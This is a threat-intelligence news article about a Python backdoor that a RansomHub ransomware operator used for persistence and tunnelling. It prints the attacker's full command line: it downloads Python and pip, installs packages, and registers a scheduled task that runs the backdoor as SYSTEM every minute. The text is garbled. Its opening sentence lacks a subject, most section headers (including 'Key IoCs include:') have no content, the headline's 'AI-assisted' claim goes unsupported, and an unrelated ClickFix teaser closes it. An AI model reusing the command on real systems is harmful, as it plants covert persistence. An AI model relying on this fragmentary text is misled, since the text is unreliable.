Python-based backdoor used by RansomHub ransomware, exploiting network flaws with AI-assisted precision. Key IoCs and insights revealed

Continue reading
In an alarming incident reported in Q4 2024, reveals evidence of a sophisticated threat actor utilizing a Python-based backdoor to maintain persistent access to compromised endpoints. This breach was exploited to deploy RansomHub encryptors across the impacted network. Earlier, in February 2024, ReliaQuest documented a prior version of this malware, highlighting the continuous evolution of this malicious tool.
GuidePoint’s investigation revealed critical updates in the latest variant of the Python-based backdoor, setting it apart from its predecessors. Key distinctions include:
Collaboration with cybersecurity experts, including @drb_ra, resulted in the publication of 18 C2 IP addresses on GitHub under the repository “drb-ra/C2IntelFeeds.”
The malware deployment followed a systematic and precise methodology:
The five-step process for installing Python and deploying the backdoor included:
wget https://www.python.org/ftp/python/3.12.0/python-3.12.0-embed-amd64.zip -OutFile .\python3.12.zip wget https://bootstrap.pypa.io/pip/pip.pyz -OutFile .\pip.pyz; .\pythonw.exe pip.pyz --trusted-host files.pythonhosted.org --trusted-host pypi.org install pycryptodome virtualenv requests pipx --upgrade pip --no-warn-script-location; powershell $a = New-ScheduledTaskAction -WorkingDirectory 'C:\Users\<redacted>\AppData\Local\ConnectedDevicesPlatform\get-pip' -Execute 'pythonw.exe' -Argument 'get-pip2.pyd'; $t = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 1); $s = New-ScheduledTaskSettingsSet -ExecutionTimeLimit '00:00:00' -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries; Register-ScheduledTask -TaskName 'get-pip2' -Action $a -Trigger $t -Settings $s -User 'system'The backdoor functions as a reverse proxy, creating a SOCKS5-like tunnel to enable lateral movement. Key operations include:
The script employs advanced obfuscation techniques and demonstrates exceptional coding standards. Observations include:
The backdoor’s C2 communications involve:
The malware’s persistence strategy involves:
Key IoCs include:

A single ClickFix infrastructure is pushing StealC, Amatera, Remus, NetSupport, CastleLoader and a new loader called ResiLoader through fake Google/Cloudflare checks.